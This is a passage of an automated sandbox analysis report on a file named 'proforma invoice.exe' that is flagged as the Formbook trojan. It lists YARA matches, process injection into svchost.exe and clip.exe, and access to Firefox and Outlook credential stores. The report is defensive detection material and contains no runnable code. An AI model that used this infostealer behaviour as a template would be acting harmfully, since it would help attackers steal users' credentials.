            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFA491_2_032FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7A461_2_032F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DDAAC1_2_032DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03285AA01_2_03285AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E1AA31_2_032E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EDAC61_2_032EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D59101_2_032D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032499501_2_03249950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B9501_2_0325B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AD8001_2_032AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032438E01_2_032438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFF091_2_032FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFFB11_2_032FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03241F921_2_03241F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD21_2_03203FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03203FD51_2_03203FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03249EB01_2_03249EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F7D731_2_032F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03243D401_2_03243D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F1D5A1_2_032F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FDC01_2_0325FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B9C321_2_032B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFCF21_2_032FFCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050305913_2_05030591
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050144203_2_05014420
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050224463_2_05022446
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F705353_2_04F70535
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0501E4F63_2_0501E4F6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F8C6E03_2_04F8C6E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F6C7C03_2_04F6C7C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F707703_2_04F70770
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F947503_2_04F94750
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0500A1183_2_0500A118
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050241A23_2_050241A2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050301AA3_2_050301AA
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050281CC3_2_050281CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050020003_2_05002000
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FF81583_2_04FF8158
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F601003_2_04F60100
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FF02C03_2_04FF02C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502A3523_2_0502A352
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050303E63_2_050303E6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F7E3F03_2_04F7E3F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050102743_2_05010274
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F60CF23_2_04F60CF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0500CD1F3_2_0500CD1F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F70C003_2_04F70C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F6ADE03_2_04F6ADE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F88DBF3_2_04F88DBF
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05010CB53_2_05010CB5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F7AD003_2_04F7AD00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05012F303_2_05012F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F82E903_2_04F82E90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F70E593_2_04F70E59
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502EE263_2_0502EE26
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F62FC83_2_04F62FC8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FEEFA03_2_04FEEFA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502CE933_2_0502CE93
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FE4F403_2_04FE4F40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F90F303_2_04F90F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FB2F283_2_04FB2F28
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502EEDB3_2_0502EEDB
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F9E8F03_2_04F9E8F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F568B83_2_04F568B8
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0503A9A63_2_0503A9A6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F728403_2_04F72840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F7A8403_2_04F7A840
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F729A03_2_04F729A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F869623_2_04F86962
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502AB403_2_0502AB40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F6EA803_2_04F6EA80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05026BD73_2_05026BD7
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050275713_2_05027571
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F614603_2_04F61460
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0500D5B03_2_0500D5B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050395C33_2_050395C3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502F43F3_2_0502F43F
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502F7B03_2_0502F7B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FB56303_2_04FB5630
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050216CC3_2_050216CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F770C03_2_04F770C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0503B16B3_2_0503B16B
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F7B1B03_2_04F7B1B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F5F1723_2_04F5F172
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA516C3_2_04FA516C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0501F0CC3_2_0501F0CC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502F0E03_2_0502F0E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050270E93_2_050270E9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F8D2F03_2_04F8D2F0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502132D3_2_0502132D
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F8B2C03_2_04F8B2C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F752A03_2_04F752A0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FB739A3_2_04FB739A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F5D34C3_2_04F5D34C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050112ED3_2_050112ED
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05021D5A3_2_05021D5A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05027D733_2_05027D73
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FE9C323_2_04FE9C32
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F8FDC03_2_04F8FDC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F73D403_2_04F73D40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502FCF23_2_0502FCF2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502FF093_2_0502FF09
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F79EB03_2_04F79EB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502FFB13_2_0502FFB1
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F33FD23_2_04F33FD2
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F33FD53_2_04F33FD5
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F71F923_2_04F71F92
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_050059103_2_05005910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F738E03_2_04F738E0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FDD8003_2_04FDD800
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F799503_2_04F79950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F8B9503_2_04F8B950
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FB5AA03_2_04FB5AA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502FB763_2_0502FB76
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FE3A6C3_2_04FE3A6C
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FADBF93_2_04FADBF9
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FE5BF03_2_04FE5BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05027A463_2_05027A46
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0502FA493_2_0502FA49
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04F8FB803_2_04F8FB80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_05011AA33_2_05011AA3
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0500DAAC3_2_0500DAAC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0501DAC63_2_0501DAC6
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_030517203_2_03051720
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0306A2803_2_0306A280
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0304CB303_2_0304CB30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0304ABB03_2_0304ABB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0304C9083_2_0304C908
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_0304C9103_2_0304C910
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_030532703_2_03053270
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04DFA43A3_2_04DFA43A
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04DFC0FC3_2_04DFC0FC
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04DFB1683_2_04DFB168
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04DFBC443_2_04DFBC44
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04DFBD643_2_04DFBD64
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 99 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 103 times
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: String function: 00ABF9F2 appears 31 times
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: String function: 00AC0A30 appears 46 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04FA5130 appears 58 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04FDEA12 appears 86 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04FEF290 appears 103 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04FB7E54 appears 107 times
            Source: C:\Windows\SysWOW64\clip.exeCode function: String function: 04F5B970 appears 262 times
            Source: proforma invoice.exe, 00000000.00000003.1652604160.00000000040ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs proforma invoice.exe
            Source: proforma invoice.exe, 00000000.00000003.1652825878.0000000003F43000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs proforma invoice.exe
            Source: proforma invoice.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@14/10
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B137B5 GetLastError,FormatMessageW,0_2_00B137B5
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B010BF AdjustTokenPrivileges,CloseHandle,0_2_00B010BF
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B016C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00B016C3
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B151CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00B151CD
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B2A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00B2A67C
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B1648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00B1648E
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00AA42A2
            Source: C:\Users\user\Desktop\proforma invoice.exeFile created: C:\Users\user\AppData\Local\Temp\autCF31.tmpJump to behavior
            Source: proforma invoice.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: clip.exe, 00000003.00000003.2038941614.0000000003260000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4103317306.0000000003282000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2036675540.0000000003282000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.2038941614.0000000003282000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: proforma invoice.exeReversingLabs: Detection: 28%
            Source: proforma invoice.exeVirustotal: Detection: 29%
            Source: unknownProcess created: C:\Users\user\Desktop\proforma invoice.exe "C:\Users\user\Desktop\proforma invoice.exe"
            Source: C:\Users\user\Desktop\proforma invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\proforma invoice.exe"
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\proforma invoice.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\proforma invoice.exe"Jump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\proforma invoice.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\clip.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\clip.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: proforma invoice.exeStatic file information: File size 1248256 > 1048576
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: proforma invoice.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NpiZrjTdIDFUidJcY.exe, 00000002.00000002.4103470681.000000000056E000.00000002.00000001.01000000.00000004.sdmp, NpiZrjTdIDFUidJcY.exe, 00000007.00000002.4103116967.000000000056E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: proforma invoice.exe, 00000000.00000003.1653485893.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, proforma invoice.exe, 00000000.00000003.1652243415.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1759986126.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1761687857.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1849352751.0000000003200000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1851656992.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000003.1849341364.0000000004BDA000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4104167554.00000000050CE000.00000040.00001000.00020000.00000000.sdmp
